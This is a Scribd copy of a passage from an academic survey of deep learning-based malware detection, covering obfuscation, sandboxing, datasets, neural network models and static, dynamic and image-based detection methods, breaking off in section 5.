0% found this document useful (0 votes)

253 views36 pages

A Comprehensive Survey On Deep Learning Based Malware Detectiontechniques

Uploaded by

thanhnguyent472003

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

253 views36 pages

A Comprehensive Survey On Deep Learning Based Malware Detectiontechniques

Uploaded by

thanhnguyent472003

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 36

Computer Science Review 47 (2023) 100529

Contents lists available at ScienceDirect

Computer Science Review

journal homepage: www.elsevier.com/locate/cosrev

Review article

A comprehensive survey on deep learning based malware detection

techniques
∗
Gopinath M., Sibi Chakkaravarthy Sethuraman (Ph.D.)
Center of Excellence, Artificial Intelligence and Robotics (AIR) & Center of Excellence, Cyber Security and School of Computer Science and
Engineering VIT-AP University, Andhra Pradesh, India

article info a b s t r a c t

Article history: Recent theoretical and practical studies have revealed that malware is one of the most harmful
Received 18 September 2021 threats to the digital world. Malware mitigation techniques have evolved over the years to ensure
Received in revised form 7 December 2022 security. Earlier, several classical methods were used for detecting malware embedded with various
Accepted 8 December 2022
features like the signature, heuristic, and others. Traditional malware detection techniques were unable
Available online xxxx
to defeat new generations of malware and their sophisticated obfuscation tactics. Deep Learning
Keywords: is increasingly used in malware detection as DL-based systems outperform conventional malware
Malware detection detection approaches at finding new malware variants. Furthermore, DL-based techniques provide
Deep learning rapid malware prediction with excellent detection rates and analysis of different malware types.
Mobile malware Investigating recently proposed Deep Learning-based malware detection systems and their evolution is
IoT malware
hence of interest to this work. It offers a thorough analysis of the recently developed DL-based malware
Windows malware
detection techniques. Furthermore, current trending malwares are studied and detection techniques of
APTs
Ransomware Mobile malware (both Android and iOS), Windows malware, IoT malware, Advanced Persistent Threats
(APTs), and Ransomware are precisely reviewed.
© 2022 Elsevier Inc. All rights reserved.

Contents

1. Introduction......................................................................................................................................................................................................................... 2
2. Malware detection and techniques .................................................................................................................................................................................. 3
2.1. Malware obfuscation methods ............................................................................................................................................................................. 3
2.2. Sandboxing techniques ......................................................................................................................................................................................... 3
2.3. Data mining models and datasets ....................................................................................................................................................................... 3
2.4. Currently trending prominent malware types ................................................................................................................................................... 5
3. Malware detection and classification approaches .......................................................................................................................................................... 5
3.1. Static analysis ......................................................................................................................................................................................................... 5
3.2. Dynamic analysis ................................................................................................................................................................................................... 6
3.3. Image processing ................................................................................................................................................................................................... 6
4. Deep Learning models ....................................................................................................................................................................................................... 6
4.1. Deep neural network............................................................................................................................................................................................. 6
4.2. Convolutional neural network.............................................................................................................................................................................. 7
4.3. Recurrent neural network..................................................................................................................................................................................... 8
5. Machine learning based malware detection techniques ............................................................................................................................................... 8
5.1. Sandboxing based malware detection................................................................................................................................................................. 8
5.1.1. Static analysis based malware detection techniques......................................................................................................................... 8
5.1.2. Dynamic and hybrid analysis based malware detection techniques ............................................................................................... 9
5.1.3. Image based malware detection techniques....................................................................................................................................... 10
5.2. Mobile malware detection .................................................................................................................................................................................... 11
5.2.1. Android malware detection techniques .............................................................................................................................................. 12
5.2.2. iOS malware detection techniques ...................................................................................................................................................... 14
5.3. Windows malware detection techniques............................................................................................................................................................ 15

∗ Corresponding author.
E-mail address: [email protected] (S.C. Sethuraman).

https://doi.org/10.1016/j.cosrev.2022.100529
1574-0137/© 2022 Elsevier Inc. All rights reserved.
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

5.4. IoT malware detection techniques ...................................................................................................................................................................... 16

5.5. APT detection techniques ..................................................................................................................................................................................... 18
5.6. Ransomware detection techniques ...................................................................................................................................................................... 19
6. Deep learning based malware detection techniques ..................................................................................................................................................... 21
6.1. Sandboxing based malware detection................................................................................................................................................................. 21
6.1.1. Static analysis based malware detection techniques......................................................................................................................... 21
6.1.2. Dynamic and hybrid analysis based malware detection techniques ............................................................................................... 22
6.1.3. Image based malware detection techniques....................................................................................................................................... 23
6.2. Mobile malware detection .................................................................................................................................................................................... 24
6.2.1. Android malware detection techniques .............................................................................................................................................. 24
6.3. Windows malware detection techniques............................................................................................................................................................ 25
6.4. IoT malware detection techniques ...................................................................................................................................................................... 26
6.5. APT detection techniques ..................................................................................................................................................................................... 28
6.6. Ransomware detection techniques ...................................................................................................................................................................... 29
7. Inference .............................................................................................................................................................................................................................. 29
8. Conclusion ........................................................................................................................................................................................................................... 30
Declaration of competing interest.................................................................................................................................................................................... 30
Data availability .................................................................................................................................................................................................................. 30
Acknowledgments .............................................................................................................................................................................................................. 30
References ........................................................................................................................................................................................................................... 30

detecting malware that uses signatures are frequently employed.

1. Introduction Despite being quick, it cannot identify sophisticated malware [8].
Signature-based traditional methods like pattern matching failed
Malware or malicious software is intentionally developed to to meet the requirements of malware detection [9]. Consequently,
cause harm to digital devices. It is referred to by a variety of dif- it is a nightmare for both end users and security providers to
ferent names, such as Trojan horse, worm, virus, bots and botnets, implement advanced security approaches [10]. Further new tech-
ransomware, adware, and spyware. Attackers target individual niques are proposed based on various features like heuristics and
computers and networks which eventually leads to an increase in model checking. Advanced data mining and Machine Learning
security loopholes. Privacy and personal information leakage are algorithms are incorporated within those techniques to detect
among the main problems faced by legitimate users. The damage malware.
incurred by cyber frauds has doubled as compared to traditional The recent technologies deliver higher efficiency than tra-
frauds [1]. There has been a significant increase in financial losses ditional technologies. Still, it is difficult to conclude malware
due to various attacks such as phishing, pharming, and misuse of detection based on any one of these approaches, as they are not
payment cards. Financial damage done by malware all over the fully effective in combating new-generation malware. By auto-
world is increasing proportionally. On a daily average, 10 lakh matically extracting and statically analysing the characteristics
malwares are generated as per scientific and business reports, and of Application Programming Interface (API) function calls where
cybercrime cost is estimated to be 6 trillion dollars in the year various dangerous features of API calls are employed, malwares
2021 [2]. According to the McAfee Covid-19 threat report, in the are discovered. [11]. To analyse harmful behaviour, this method
past 4 quarters malware attacks have increased by 1902% and 375 entails four steps; unpacking malware, retrieving an assembly
new cyber-crimes per minute have been recorded worldwide [3]. program, extracting API calls, and mapping API call with Microsoft
During the period 2019 to 2024, the market for malware analysis Developer Network (MSDN) library to evaluate dangerous be-
is expected to increase from 3 billion USD to 11.7 billion USD at haviour. Additionally, an advanced new method is implemented
a 31% CAGR [4]. AV-Test Institute’s recent estimate reports that with five steps which makes use of Machine Learning algorithms
more than 3.6 lakhs of new malwares are produced daily, approx- like Support Vector Machine (SVM) with n-gram features and
imately 4.2 malwares each second [5]. Every year, the growth of 10-fold cross-validations [12]. For the detection and classifica-
malware surges by 100 million based on the report of the past tion of zero-day malware, a framework is implemented with the
5 years. To provide a comprehensive response to cyber threats, help of various traditional Machine Learning classifiers [13]. To
which is challenging and dangerous, several security firms are understand the behaviour of malware, both static and dynamic
implementing various tools. Researchers use Machine Learning analysis approaches are utilized to extract features such as Win-
and Deep Learning approaches to create an effective model to dows API calls, from the malware. For profiling and classifying
resolve these issues by involving detailed studies [6]. Malware the behaviours of malware, resemblance-oriented mining and
mitigation techniques are also becoming more sophisticated with Machine Learning algorithms are used [14]. It is dependent on
the increase in malware diversity. the sequence of API calls and their respective frequency. True and
Earlier, malwares were written using simple codes and were false-positive rates are achieved as 0.94 and 0.051 respectively
detected easily. Whereas nowadays, malware creators increase from the result of detecting malware.
the complexity of code as a result even advanced techniques To achieve high accuracy in malware detection, a hybrid wrap-
fail to detect them. It is difficult to identify the next-generation per filter model is proposed [15]. The highest significance and
malwares compared to traditional malwares which is designed lowest redundancy are considered in it with the help of the
to execute on the kernel. These types of malwares easily es- SVM wrapper. It is a fully automated framework and employs a
cape from security systems like firewalls and antivirus. They signature-free method to detect malware that evades identifica-
persist in a system or network permanently, spread through tion by methods relying on signatures. Alazab et al. describe many
multiple extensions, and attack the targeted user. There are var- types of obfuscated malware and their development in depth, as
ious kinds of malware detection approaches based on miscel- well as the significance of anomaly detection [16]. Neural net-
laneous features like the signature, heuristic, behaviour, model works are incorporated to detect malware where domain knowl-
checking, cloud, mobile devices, Internet of Things (IoT), Ma- edge is taken from Portable Executables (PE) header and networks
chine Learning, and Deep Learning [7]. Initially, methods for learn entirely from raw bytes [17]. The challenges and many
2
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

issues with the dynamic analysis approach are covered exten- 32]. Malware writers are utilizing Antivirus evasion (AV) tech-
sively in [18]. A reinforcement learning agent is also employed to niques to avoid antivirus software-related applications. Likewise,
operate on PE files [19]. Knowledge extraction of raw data can be security researchers and penetration testers also use such tech-
either structured or unstructured where data science approaches niques for security implementation. Attackers leverage static as
are utilized [20]. Deep Learning comprising multiple processing well as dynamic AV techniques to exploit the target machines
layers and deep convolutional networks provides possibilities to by executing generated payloads. Static analysis bypasses an-
process different forms of files like text, image, video, audio, and tivirus signature scanning algorithms used for malware detection.
PE [21]. Dynamic execution avoids behaviour detection during sample
This paper presents a detailed survey of recent Deep Learning- execution. Malware samples are executed within a sandbox or
based malware detection techniques. The progression of inno- AV emulator. The advanced next-generation malware adopts ob-
vations from the beginning to the present is demonstrated. To fuscation methods like encryption, oligomorphic, metamorphic,
improve the study, the benefits and shortcomings of each tech- stealth, and packaging. These obfuscation methods help malwares
nique are also explored. The major contributions of this paper are to evade malware detection techniques. Using encryption tech-
as follows niques, malware can be concealed somewhere inside the entire
program [18]. Encryption is also used for packaging. It allows
• It provides an advanced and detailed review of the evolu- malwares to remain hidden from detection techniques by cre-
tion of Deep Learning-based malware detection techniques ating four diverse types of packers like compressors, crypters,
from the traditional levels. It also elaborates the discussion protectors, and bundlers [20,21].
based on sandboxing approaches, Deep Learning models, In the oligomorphic method, two different keys are used with
and current trending malwares such as Ransomware, APT a payload of malware whereas separate keys are used for per-
and traditional malwares like IoT, Windows, Android, and forming encryption and decryption [33]. This makes malware
iOS. detection harder. The polymorphic method is similar to oligo-
• There have been several reviews carried out on malware de- morphic method; the dichotomy between them is taking more
tection techniques in recent days [7,22,23]. In these works, copies of the encrypted payload. Thus, it makes detecting mal-
there are a few limitations on focuses like file-less malware ware even more complex [34,35]. While incorporating the meta-
and APTs including those which were not covered even morphic method, the dynamicity of malicious code is enabled for
in a single deep learning technique [23]. Review works each iteration of the malicious process [19]. The stealth method
based on Machine Learning and Deep Learning are carried hides malware from a secure system by adopting several counter
further but those are not mapped with trending malwares methods like code modification and data encryption [33].
like Ransomware, APTs, etc. whereas this survey correlates
them [24–26]. 2.2. Sandboxing techniques
• Research gaps in the recent mitigation techniques are also
discussed which will be helpful for the enhancement of Malware detection is a decision-making process. At the end
future reviews. Taxonomy is proposed in Fig. 1 derived from of this process, the malicious program is identified. Malware
recent research works and the relationship between these researchers utilize a sandbox environment to execute malicious
works is highlighted. code obtained from unknown attachments or suspicious URLs for
• Finally, the claim for contribution is extended as this survey observing the behaviours of malware code. As a sandbox is an
will guide researchers in the right direction for building mit- emulated environment, it is easy to observe the suspicious code
igation techniques for traditional and advanced malwares. without acquiring access to data, network and other applications.
Also, it will be helpful for those who are working in Deep It acts as quarantine over unknown emails and attachments and
Learning-based malware detection and prevention. plays a key role in isolating suspicious executable programs.
Analysing the malware, extracting the features and classifica-
The rest of the paper is categorized into the following sec-
tion are the three basic steps of the detection process. While
tions: Section 2 provides brief information about malware obfus-
analysing malwares, it is important to study their behaviour.
cation methods, datasets, sandboxing techniques and currently
The working of malwares and the damage caused by them are
trending prominent malware types, Section 3 details malware
studied extensively in [36,37]. Static and dynamic analyses are
classification approaches, Section 4 describes various Deep Learn- the two momentous techniques for analysing malwares [37].
ing models for malware detection, Section 5 explores Machine Static analysis examines the executable file without running the
Learning-based malware detection techniques on the basis of program to analyse behaviours. The dynamic analysis evaluates
Sandboxing techniques, malware detection techniques of Mobile behaviours at the time of execution of the program and it is
malware including Android and Mac OS, Windows malware, IoT performed in a Virtual sandboxed environment. The malware
malware, APT, and Ransomware, In a similar vein, Section 6 analysis cycle starts with simple static analysis and ends with an
examines Deep Learning-based malware detection techniques efficient dynamic analysis.
based on Sandboxing techniques, malware detection techniques
for Mobile malware, including Android and Mac OS variants, 2.3. Data mining models and datasets
Windows malware, IoT malware, APT, and Ransomware, Section 7
details the inferences observed from this survey and finally the Data mining methods are utilized for extracting the features of
conclusion of this review work is presented in Section 8. malware. It creates more semantic information from large-scale
datasets. Recently developed and significant data mining models
2. Malware detection and techniques for generating datasets and features include the N-gram model
and the graph model [38].
2.1. Malware obfuscation methods n-gram model: Features are generated based on character-
istics of static and dynamic analysis. APIs and system calls are
A virus was the first type of malware to be discovered around combined to provide features.
the end of the 1980s, and studies show that finding viruses is graph model: Graph G(V,E) is generated from the system
a difficult task which is also non-Polynomial complete [17,27– calls in which V denotes nodes that specify system calls and E
3
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Fig. 1. Taxonomy of research.

is denoted as the edges helpful for relating these system calls. Support Vector Machine (SVM) [48,49], and Sequential Mini-
Sub-diagram is needed when the size is increased and it is Non- mal Optimization (SMO) [50] are examples of Machine Learning
deterministic Polynomial (NP) complete. classifiers that utilize behaviour to make predictions.
Malware dataset is a key factor for malware detection. The The NSL KDD-2009 dataset is used for IDS purposes and
formats of existing datasets can occasionally make it challenging has approximately 1, 25,000 records and 41 features [28]. The
to use them for mining. NSL KDD, Drebin, MS malware classifica- Drebin-2014 dataset has 5560 malwares over 20 families and it
is used for smartphone purposes [51]. The MS Malware Classi-
tion challenge, ClaMP, AAGM, and EMBER are some examples of
fication Challenge-2015 dataset contains disassembly code and
datasets used so far. In the classification stage, Machine Learning
byte code for 20,000 different types of malware [52]. The ClaMP-
algorithms are used. Machine Learning is applied for carrying out 2016 dataset comprises 5184 records and 55 properties [53]. The
operations like classification, regression, and clustering over data. AAGM-2017 dataset is associated with Android malware which
Bayesian Network (BN) [39], Naive Bayes (NB) [40], C4.5 Decision has 400 malwares from 12 families [54]. The EMBER-2018 dataset
Tree variant (J48) [41], Logistic Model Trees (LMT), Random Forest is created with more than 1 million records covering the features
Tree (RF) [40,42,43], K-Nearest Neighbour (KNN) [44,45], Multi of benign and malware for detecting Windows malware files [55].
Layer Perceptron (MLP) [46,47], Simple Logistic Regression (SLR), There are several datasets created by the Canadian Institute
4
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

of Cyber security (CIC) [56]. CIC-MalMem-2022, an obfuscated 3. Malware detection and classification approaches
malware dataset, was developed by implementing memory-based
detection methods. It contains 29,298 benign and 29,298 malware Today malware is coded to present features from multiple
samples. Android malware dataset CCCS-CIC-AndMal-2020 has a families at the moment of discovery, making malware classifica-
total of 400k apps in which 200k samples are benign and 200k tion extremely challenging. As advanced malwares are executed
samples are malware. in the kernel it is hard to discover them when compared with
classical malwares. These types of malwares easily escape from
2.4. Currently trending prominent malware types
security systems like firewalls and antivirus. In this section, the
In the year 2019, 4,368,921,256 records were assessed by advantages and drawbacks of classification techniques for de-
security experts [5]. 10 lakh spam messages and 5 lakh URLs are tecting malware based on static and dynamic analysis are dis-
evaluated. Around 3 million files were tested every day with a cussed. Further for malware detection, image processing-based
size of 2500 TB. In earlier 2020, the malware growth reached over techniques are also utilized with big data to enhance the visu-
43 million which implies the most dangerous scenario in 2020 alization of data and efficient decision-making.
with a development of 4.2 samples per second and most attacks
are targeted at the Windows operating system [5]. Global mal- 3.1. Static analysis
ware strikes reached 2.8 billion in the first half of 2022, up 11%
year to date from 2021, according to threat experts at SonicWall Earlier malware classification approaches used various fea-
Capture Labs [57]. Malware exploitation is concentrated in two tures like n-gram which includes multi-byte identifiers and
different areas by the attackers. Initially, by creating automated strings [53]. Sequence CNN is applied for classification where
bulk malware, widespread web attacks are targeted. Further,
features are extracted from the bytes of binaries [35]. Ember
sophisticated malware is created to target specialized attacks,
large-scale dataset is used for training ML models and detection
which use a specially created attack tool based on previously
of PE files [54]. It has 1.1 million binary files in which 900k
determined victim infrastructure. Microsoft systems are the most
targeted for launching attacks by cybercriminals, according to are training samples and 200k are testing samples. Other than
statistics [5]. a benchmark dataset, it is useful for end-to-end deep learning.
A byte/entropy 2histogram is computed for malware detection
Trojans using deep neural networks [58].
Trojans are a type of malicious software that typically deceives Han et al. implemented a program profiling model MalIn-
people into thinking they are not at all harmful. Trojans usually sight for detecting malware. Profiling is performed by consider-
spread through spam emails and downloadable files by hiding
ing the structure, low-level, and high-level behavioural features
themselves. Trojans are usually spread by visiting contaminated
of malwares [42]. Structural information is obtained from ba-
websites, opening bulky spam mail, downloading illegitimate
sic structural profiling. Operations between programs and OS
apps and software, and running suspicious files of movies and
songs. Also, there are possibilities from QR coders, storage devices lead to low-level profiling and the operations on files, registry,
like USB drives, and external hard disks. Once an adequate count and network lead to high-level profiling. Machine Learning-based
of infected systems is identified, attackers will proceed with spe- classifiers like KNN, DT, RF, and Extreme Gradient Boosting are
cial codes. According to ThreatFabric, more than 3 lakh customers trained by the resultant feature set to detect or classify malwares.
of the Google Play store contracted Mobile banking Trojans in Evaluation is carried over the dataset which includes 4250 sam-
2021. ples from operating systems like VirusShare and Windows 7 Pro.
It detects new malware types with 97.21% accuracy as per the
Ransomware
results.
Ransomware malware denies access to the device and pri-
vate files and demands a ransom fee which should be paid to Kim et al. implemented a multimodal deep learning scheme
gain access back. Several types of ransomware are available like to detect Android mobile malwares [59]. It used many features
Android ransomware, Mac ransomware, Scareware, and so on. like string, method opcode, method API (Application Program-
They aim to deny users or organization access to files on their ming Interface), function opcode of the shared library, permission,
computers. Ransomware became a profitable source of business component, and environment. Various features are extracted, and
for cybercriminals in 2019, tripled in 2020 and reached a peak a feature vector was generated which was used to provide train-
with 900,000 malware samples [58]. In the first half of 2022, 23% ing to the initial networks. The final network was trained by using
drop in ransomware attacks globally [57]. the results of the initial networks. An evaluation was carried out
with 41,260 samples.
Advanced Persistent Threats (APT)
APTs utilize unbroken, stealthy, and complicated approaches Fang et al. built Deep Q learning-based Evading Anti-malware
to hacking to get permission into the system and stay within the engines (DQEAF) framework with the help of reinforcement
extended period in the company of high-level vulnerabilities [5]. learning for exposing and demonstrating the weakness of su-
The enormous count of APTs is a challenging task to tackle in pervised learning-based malware detection models [60]. DQEAF
the security system. APTs are planned attacks and are purposely trained an Artificial Intelligence (AI) agent, the default primary
targeted towards multiple firms and institutions for obtaining component for interacting with malwares through neural net-
valuable information and also, including target areas of public, works, which plays a vital role in choosing the optimal sequence
financial, and research. of safety actions by incorporating reinforcement learning. Results
of DQEAF show a 75% success rate which is high in Portable
Potentially Unwanted Applications (PUA)
Potentially Unwanted Applications (PUA) is another kind of Executable (PE) samples. Later, they introduced Deep Q learning-
malware attack in the digital world [5]. It is spyware that is based Feature Selection Architecture (DQFSA), a further archi-
intentionally installed in devices along with the package of soft- tecture for feature selection using reinforcement learning [40].
ware while the apps are downloaded. Advertisement industries An AI agent interacts with the samples’ feature space to obtain
make use of PUAs for the detection and investigation of indi- the optimized reasonable features continuously where human
vidual behaviour for obtaining information. PUAs target users intervention is avoided. Classifiers like KNN, DT, RF, NB, and SVM
with personal advertisements by injecting unnecessary secret are utilized, and better accuracy is obtained with them than with
questions. existing architectures.
5
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

3.2. Dynamic analysis domains are segregated from normal domains in the two-level
model where the clustering method is used for identifying al-
RNN is trained for extracting process behaviour features after gorithms to generate DGA domains. Prior to designing a time
which CNN is trained for categorizing images [28]. For the pro- sequence model oriented on a Hidden Markov Model (HMM)
jection stage, Echo State Network (ESN) and RNN are used where to anticipate incoming domain features, a Deep Neural Network
features are extracted by training 150k samples. For detecting (DNN) system is adopted in the prediction model. Classification
malware and benign, a shallow multi-task deep learning archi- by this machine learning framework’s result is shown to have an
tecture is proposed [38] based on natural language modelling accuracy of 95.89%.
in which the language of malware is trained to extract features. Similarities in the structure of malwares are utilized in the
To get optimal malware classification results convolutional and works [66,67]. Signal and image processing methods are imple-
neural networks’ recurrent layers are combined which improves mented for detecting and classifying malware where malwares
modelling and classification of system call sequence [52] and are treated like images or signals. This method, which is based
outperforms Hidden Markov Models and SVM. on meta-learning, is expanded for forensics and the classification
An RNN-based malware prediction model is proposed with of data types. Search and RetrieVAl of Malware (SARVAM) is pre-
two various datasets and malicious files are predicted before the sented to perform searching and retrieving online malwares [68].
execution of the payload to prevent attacks [34]. The performance Executable binary files can be uploaded by any person and can be
of the classical Machine Learning classifiers is also evaluated. searched from the database of 70 lakh samples of malware with
Results have shown 94% accuracy with an execution time of 5 s. the help of Image Similarity metrics.
Behavioural data collected through dynamic analysis of all the An automated malware classification method proposed in the
models are examined and Hidden Markov Model is trained by work [69] uses image texture analysis. The outcomes demon-
employing both static and dynamic analysis. Comparison of fea- strate more effectiveness than dynamic analysis using a sizable
tures is performed to detect In order to identify malware families, dataset with over 685k malwares. For quick recognition of packed
comparisons of attributes are made, and the results show that the executables, core binary data is evaluated and SVM is used for
dynamic approach performs better [61]. both training and testing purposes [70]. By expressing binary
A Multi-Level Deep Learning System (MLDLS) was devised bytes as audio signals, an approach for detecting malware is
by Zhong et al. to improve the efficiency of Deep Learning- proposed [71]. Music Information Retrieval (MIR) techniques are
based Malware Detection Systems (MDSs) [62] that utilized a tree then used to identify musical patterns. Further, ML classifiers are
structure to coordinate multiple deep learning models. Instead, used. A slight change in the original code is made as malicious by
each deep learning model focuses on learning a particular data malware authors. These minor changes are captured as images
distribution for a particular class of malware, and all deep learn- and similar images are formed as a family. Features are extracted
ing models in the tree collaborate to reach a decision. Although by classification or clustering techniques.
the network behaviour is impacted, Shibahara et al. developed a Image-based malware analysis is fast and provides a lot of
method that improves the effectiveness of dynamic analysis [51]. information regarding the structure of malware. SigMal [72] is
This approach is focused on identifying the two unique aspects of a fast signal processing technique applicable for both packed
malware communication, which are variations in the communi- and unpacked samples which is a resemblance-based frame-
cation mechanism and latent function. The same data structures work for malware detection. Signal processing-based features are
in malware communication and natural language are monitored improved by the heuristics of PE structure information. Mal-
and evaluated with 29,562 samples of malware. ware detection techniques use a variety of image-based malware
Vinaya Kumar et al. built a malware detection framework that datasets, including Malimg, VGG16, and ImageNet [37]. The accu-
consists of two stages [63]. In order to create a highly scalable racy of VGG16 with SVM is higher than VGG16 with scratch [36].
malware detection framework, classical Machine Learning meth- Later, theYongImage method [73] is implemented for detecting
ods as well as deep learning frameworks based on static, dynamic, malwares.
and image processing are explored. Initially, malware classifica-
tion is performed by implementing static and dynamic analyses. 4. Deep Learning models
Using the image processing method, malwares are grouped into
their respective families in the second stage. The resilience of the Machine Learning, which is employed in conjunction with
suggested framework in the work [64] must be taken into account artificial intelligence technology and relies on samples for learn-
since it is intended for an efficient zero-day malware detection ing, gives way to Deep Learning. The process of extracting fea-
mechanism. tures from an input involves establishing numerous layers in
a hierarchy. There are many applications of Deep Learning like
3.3. Image processing automated cars, image processing, and language processing. Deep
Learning models are built based on either Supervised or Unsu-
Today detecting malicious files by examining large-sized data pervised Learning [8,13,27,35,36,52,53,74–79]. They differ based
has become a difficult challenge for security providers. For on the training methodology. Supervised model training is carried
analysing vast amounts of malwares, a malware classification through the examples of specific datasets whereas only input data
model is proposed by utilizing deep learning which is based is given for unsupervised models. Here, deep neural networks,
on images [65]. Orthogonal methods for malware detection are convolutional neural networks, and recurrent neural networks
based on signal and image processing. Azmoodeh and Choo pre- are also discussed which are useful for real-time environments.
sented a scheme to detect malwares for the Internet of Battlefield Fig. 2 shows the basic Deep Learning architecture.
Things (IoBT) devices by implementing deep learning through the
sequence of the device’s opcode. 4.1. Deep neural network
Li et al. designed a Machine Learning framework for detecting
malwares based on Domain Generation Algorithm (DGA) [8]. A deep neural network is an artificial neural network that
Many DGA domains are classified using the deep learning method is incorporated with many layers amid input layers and output
by collecting one year’s real-time traffic data. This framework layers of the network. Sample DNN with n hidden layers (h1 to
is made with a two-level model and a prediction model. DGA hn ) is shown in Fig. 3. By using random projections, the input size
6
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Fig. 2. Deep Learning architecture.

Fig. 3. Deep Neural Network (DNN).

of the large-scale network is reduced with a factor of 45 over 2.6 model called Multi-Task Neural Network (MtNet) has been pro-
million samples. It shows the result in terms of two-class error posed to classify malware [38] where benign and malicious are
rate as 0.49% and 0.42% for solo neural networks and ensemble classified through dynamic analysis. 4.5 million files are trained,
of neural networks respectively [80]. The accuracy of detection and 2 million files are tested. MtNet attained a 0.358% binary
does not depend on incrementing the hidden layers. Two and classification error rate and a 2.94% malware family classification
more layered neural networks result in lesser performance than error rate based on the results.
single-layered neural networks.
Droid-Sec makes use of deep learning in which results are 4.2. Convolutional neural network
compared with earlier 5 machine learning models like SVM, C4.5,
Naïve Bayes, LR, and MLP [81] and is designed for Android mal- A convolutional neural network is derived from DNN which
wares. Implementing a Deep Belief Network (DBN) allows for is used for enhancing visualization. Fig. 4 depicts the sample
the creation of the deep learning model [82]. In addition, Re- CNN. CNN was applied for image recognition that employs a
stricted Boltzmann Machines (RBM), components, and algorithms unique feature extractor and image size normalization [83]. CNN
are taken into account. Comparing the results to those of more es- has trained over 1.2 million HD images for classification [84].
tablished techniques like SVM, C4.5, and Naive Bayes, the results For faster training, non-saturated neurons, and highly configured
obtained are more promising. Graphics Processing Units (GPUs) are used. Davis et al. applied
The features of 2D binary programs are used for detecting CNN for malware detection and features were extracted by dis-
malwares that use a deep neural network [58]. The whole frame- assembling byte codes [27]. Similarly, more researchers applied
work is separated into 3 stages. In the first stage, four various CNN to the byte code of malware to represent 2-Dimensional
features are extracted from benign and malicious binaries. The Grayscale images [29,30,66,68–70]. Each sample is normalized
deep neural network is built in the second stage with an input with a size of 32 ∗ 32 pixels by implementing down sampling.
layer, an output layer, and 2 hidden layers. The third one is a Expert domain knowledge is not required for CNN-BiLSTM
score calibrator in which the probability of malware files and (Bi Long Short-Term Memory) model which depends on data
is measured by translating the outputs of the neural network. for feature extraction [85]. Similarly, Kolosnjaji et al. proposed a
Over 4 million software binary files, 95% DR (Detection Rate), model by merging CNN and LSTM where API call sequences are
and 0.1% FPR (False Positive Rate) were attained in this. Cross- observed by CNN and the relationships are carried by LSTM [52].
validation-based methods show high accuracy compared to split Outputs from the convolutional layers are connected to forward
validation methods.that implies multiple benign samples need to and backward layers of LSTM in the CNN-BiLSTM model [85].
be analysed to produce improved accuracy. A deep learning-based Outputs of those LSTM layers are combined to provide an output.
7
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Fig. 4. Convolutional Neural Network (CNN).

CNN-BiLSTM provides the best performance in accuracy when 5. Machine learning based malware detection techniques
compared with CNN. The embedding layer is incorporated with
the neural network whereas max pooling is applied for the con- 5.1. Sandboxing based malware detection
volutional layer. The Convolutional layer learns with n-gram sig-
natures to detect opcodes of malwares [74]. Hierarchical Convo- 5.1.1. Static analysis based malware detection techniques
lutional Neural Network (HCNN) [13] is proposed for treating the Graph similarities are computed by utilizing an altered his-
hierarchical configuration of Program Executables that uses CNN togram to analyse and classify malware [89]. Experimental results
mnemonics to record features at the functional level show that the accuracy of detection is high. Utilizing control
flow graphs, quick malware detection is put into place to find
4.3. Recurrent neural network malware and classify it according to its family (CFGs) [90]. Ev-
ery family’s signature is created using the Bloom filter, which
RNN is a form of Artificial Neural Network (ANN) which is also helps to reduce feature complexity and hence the cost of
applied in recognition of speeches along with natural language computation. Features are summarized with the help of CFGs to
processing. Sequential events are observed to predict the next define the similarities. Identical block numbers, edge directions,
action.RNN is used to carry all information from the beginning and sequences of instructions are also considered. For similar and
to the end of time which is referred to as the Long–Short Term different families, the ratio of similarity is obtained as 0.82315
Memory Module (LSTM) and is utilized to avoid the gradient and 0.01970 respectively. The malware classification method is
problem [86]. Sample RNN is depicted in Fig. 5. For time-based proposed with the extraction of malware features where every
sequential prediction, RNN is employed where features are taken library of malware is counted [91]. Massive amounts of malwares
from previous inputs [27]. It has more application areas like are obtained from McAfee, Kaspersky, Norton, and F-Secure for
speech recognition and synthesis, robot control, machine transla- authenticity purposes. Similarities among malware families are
tion, music composition, etc. CNN is initially employed for chunk analysed using API calls per DLL (Dynamic Link Library) and
analysis. library functions are imported for the run time environment.
In API call tracing for detecting malware, RNN with integrated Euclidean distance and multi-layer perceptrons are utilized to
LSTM and GRU, performed better (Gated Recurrent Unit) [87]. It classify the different malwares.
has 2 stages, LSTM and GRU pick up features in the initial stage, Every value printed in the destination registers of runtime
and features are categorized in the subsequent stage. Sequential traces is utilized for malware classification [92]. Complete pro-
dependencies are modelled in API calls where previous inputs filing is examined to recognize the functions of every program.
provide output [28]. Gradient problem is avoided by combining 4 The similarity of traces is computed by implementing a two-step
layers of LSTM with RNN. Before training CNN, RNN is applied to procedure depending on the values of the sequence. Cluster-
build a behavioural model with data. And then the output of RNN ing is applied to group the samples; also, the reuse of code
is transformed into feature images for CNN. RNN is utilized for is ensured. Various malware families are differentiated by im-
detecting unknown malware/threats in the IoT environment [88], plementing a method that converts malware programs into a
where opcodes are used for the classification of malwares. Further visualized image [93]. Furthermore, visualized images are trans-
SVM is employed to assess opcodes and discover the feature set ferred to entropy graphs for finding the similarities between
of malware. The use of the n-gram method enables it to achieve malware families and classification.
accuracy at the level of 96%. True +ve values and false +ve values To detect malware and benign, feature extraction is imple-
of malware samples are computed by applying deep learning mented in android applications. Explainable machine learning
methods. It gives 98% of malware detection accuracy. is utilized to develop a lightweight android malware detection
Neural networks are utilized to classify malware into their system named PAIRED [94]. Recursive feature elimination (RFE)
predefined families. Convolutional and recurrent layers are is utilized for maintaining the minimum possible critical fea-
analysed to model call sequences. The convolutional layer’s out- tures. For training purposes, 35 static features of applications
put is connected to the recurrent layer [52]. On top of CNN, are extracted. Further making use of Shapley Additive Explana-
RNN is applied in LSTM in which a feature vector is obtained by tion (SHAP) values, the presented classifier model is explained
considering the whole file contents [85]. Moreover, input to the with the selected features. Based on experiment results more
